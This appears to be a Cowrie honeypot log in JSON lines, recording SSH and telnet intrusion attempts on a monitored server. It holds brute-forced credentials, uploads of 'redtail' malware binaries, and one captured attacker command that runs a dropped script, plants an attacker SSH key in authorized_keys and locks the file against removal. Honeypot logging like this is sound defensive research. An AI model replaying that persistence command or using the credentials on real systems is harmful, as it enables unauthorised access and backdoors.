{"eventid":"cowrie.session.closed","duration":"17.6","message":"Connection lost after 17.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:10:56.024331Z","src_ip":"212.227.235.229","session":"e0a7611379ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43678,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb1ae1f188e6","protocol":"ssh","message":"New connection: 212.227.235.229:43678 (1.2.3.4:22) [session: bb1ae1f188e6]","sensor":"my-vps","timestamp":"2025-08-28T02:10:56.132322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:10:56.134204Z","src_ip":"212.227.235.229","session":"bb1ae1f188e6"}
{"eventid":"cowrie.client.kex","hassh":"5f904648ee8964bef0e8834012e26003","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 5f904648ee8964bef0e8834012e26003","sensor":"my-vps","timestamp":"2025-08-28T02:10:56.238806Z","src_ip":"212.227.235.229","session":"bb1ae1f188e6"}
{"eventid":"cowrie.login.success","username":"root","password":"Ubuntu2014!","message":"login attempt [root/Ubuntu2014!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:10:56.667230Z","src_ip":"212.227.235.229","session":"bb1ae1f188e6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:11:20.193475Z","src_ip":"212.227.235.229","session":"bb1ae1f188e6"}
{"eventid":"cowrie.command.input","input":"chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","message":"CMD: chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","sensor":"my-vps","timestamp":"2025-08-28T02:11:20.194222Z","src_ip":"212.227.235.229","session":"bb1ae1f188e6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","size":80,"shasum":"96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:11:20.312407Z","src_ip":"212.227.235.229","session":"bb1ae1f188e6"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-28T02:11:20.420160Z","src_ip":"212.227.235.229","session":"bb1ae1f188e6"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-28T02:11:20.422305Z","src_ip":"212.227.235.229","session":"bb1ae1f188e6"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-28T02:11:20.425327Z","src_ip":"212.227.235.229","session":"bb1ae1f188e6"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-28T02:11:20.427707Z","src_ip":"212.227.235.229","session":"bb1ae1f188e6"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-28T02:11:20.430160Z","src_ip":"212.227.235.229","session":"bb1ae1f188e6"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-28T02:11:20.431109Z","src_ip":"212.227.235.229","session":"bb1ae1f188e6"}
{"eventid":"cowrie.session.closed","duration":"24.4","message":"Connection lost after 24.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:11:20.543336Z","src_ip":"212.227.235.229","session":"bb1ae1f188e6"}
{"eventid":"cowrie.session.connect","src_ip":"64.226.104.126","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e67a9d0ec0c","protocol":"ssh","message":"New connection: 64.226.104.126:6103 (1.2.3.4:22) [session: 4e67a9d0ec0c]","sensor":"my-vps","timestamp":"2025-08-28T02:11:27.756455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T02:11:27.780992Z","src_ip":"64.226.104.126","session":"4e67a9d0ec0c"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T02:11:27.800484Z","src_ip":"64.226.104.126","session":"4e67a9d0ec0c"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T02:11:27.817837Z","src_ip":"64.226.104.126","session":"4e67a9d0ec0c"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:11:27.819252Z","src_ip":"64.226.104.126","session":"4e67a9d0ec0c"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":33718,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e811d20fd1c","protocol":"ssh","message":"New connection: 194.233.79.134:33718 (1.2.3.4:22) [session: 3e811d20fd1c]","sensor":"my-vps","timestamp":"2025-08-28T02:11:34.620128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:11:34.645451Z","src_ip":"194.233.79.134","session":"3e811d20fd1c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:11:34.833459Z","src_ip":"194.233.79.134","session":"3e811d20fd1c"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia123","message":"login attempt [nvidia/nvidia123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:11:37.060550Z","src_ip":"194.233.79.134","session":"3e811d20fd1c"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:11:38.303073Z","src_ip":"194.233.79.134","session":"3e811d20fd1c"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":37956,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbfa845a776d","protocol":"ssh","message":"New connection: 194.233.79.134:37956 (1.2.3.4:22) [session: bbfa845a776d]","sensor":"my-vps","timestamp":"2025-08-28T02:13:11.739004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:13:11.801155Z","src_ip":"194.233.79.134","session":"bbfa845a776d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:13:11.948214Z","src_ip":"194.233.79.134","session":"bbfa845a776d"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456","message":"login attempt [root/AA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:13:13.241756Z","src_ip":"194.233.79.134","session":"bbfa845a776d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:13:13.627062Z","src_ip":"194.233.79.134","session":"bbfa845a776d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T02:13:13.627794Z","src_ip":"194.233.79.134","session":"bbfa845a776d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:13:14.659018Z","src_ip":"194.233.79.134","session":"bbfa845a776d"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:13:14.660099Z","src_ip":"194.233.79.134","session":"bbfa845a776d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49646,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9a8cd6c3a98","protocol":"ssh","message":"New connection: 217.72.205.35:49646 (1.2.3.4:22) [session: d9a8cd6c3a98]","sensor":"my-vps","timestamp":"2025-08-28T02:13:35.733443Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:13:35.734546Z","src_ip":"217.72.205.35","session":"d9a8cd6c3a98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47278,"dst_ip":"1.2.3.4","dst_port":22,"session":"592fe5b7fd6a","protocol":"ssh","message":"New connection: 212.227.235.229:47278 (1.2.3.4:22) [session: 592fe5b7fd6a]","sensor":"my-vps","timestamp":"2025-08-28T02:14:09.393070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:14:09.393984Z","src_ip":"212.227.235.229","session":"592fe5b7fd6a"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T02:14:09.499925Z","src_ip":"212.227.235.229","session":"592fe5b7fd6a"}
{"eventid":"cowrie.login.failed","username":"arkserver","password":"123456","message":"login attempt [arkserver/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:14:09.822406Z","src_ip":"212.227.235.229","session":"592fe5b7fd6a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:14:10.931035Z","src_ip":"212.227.235.229","session":"592fe5b7fd6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37248,"dst_ip":"1.2.3.4","dst_port":23,"session":"2fc796096712","protocol":"telnet","message":"New connection: 212.227.125.160:37248 (1.2.3.4:23) [session: 2fc796096712]","sensor":"my-vps","timestamp":"2025-08-28T02:14:31.826325Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41716,"dst_ip":"1.2.3.4","dst_port":23,"session":"36eda0d7b698","protocol":"telnet","message":"New connection: 212.227.235.229:41716 (1.2.3.4:23) [session: 36eda0d7b698]","sensor":"my-vps","timestamp":"2025-08-28T02:14:36.329584Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T02:14:36.853986Z","src_ip":"212.227.235.229","session":"36eda0d7b698"}
{"eventid":"cowrie.session.closed","duration":2.9348104000091553,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:14:39.264321Z","src_ip":"212.227.235.229","session":"36eda0d7b698"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41730,"dst_ip":"1.2.3.4","dst_port":23,"session":"fdd8dd25df18","protocol":"telnet","message":"New connection: 212.227.235.229:41730 (1.2.3.4:23) [session: fdd8dd25df18]","sensor":"my-vps","timestamp":"2025-08-28T02:14:39.476728Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:14:39.976088Z","src_ip":"212.227.235.229","session":"fdd8dd25df18"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:14:39.994777Z","src_ip":"212.227.235.229","session":"fdd8dd25df18"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T02:14:40.240819Z","src_ip":"212.227.235.229","session":"fdd8dd25df18"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.7","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:14:42.672122Z","src_ip":"212.227.235.229","session":"fdd8dd25df18"}
{"eventid":"cowrie.session.closed","duration":3.2013914585113525,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:14:42.678050Z","src_ip":"212.227.235.229","session":"fdd8dd25df18"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":51426,"dst_ip":"1.2.3.4","dst_port":22,"session":"96ee5b588609","protocol":"ssh","message":"New connection: 194.233.79.134:51426 (1.2.3.4:22) [session: 96ee5b588609]","sensor":"my-vps","timestamp":"2025-08-28T02:14:53.715945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:14:55.848119Z","src_ip":"194.233.79.134","session":"96ee5b588609"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:14:55.848875Z","src_ip":"194.233.79.134","session":"96ee5b588609"}
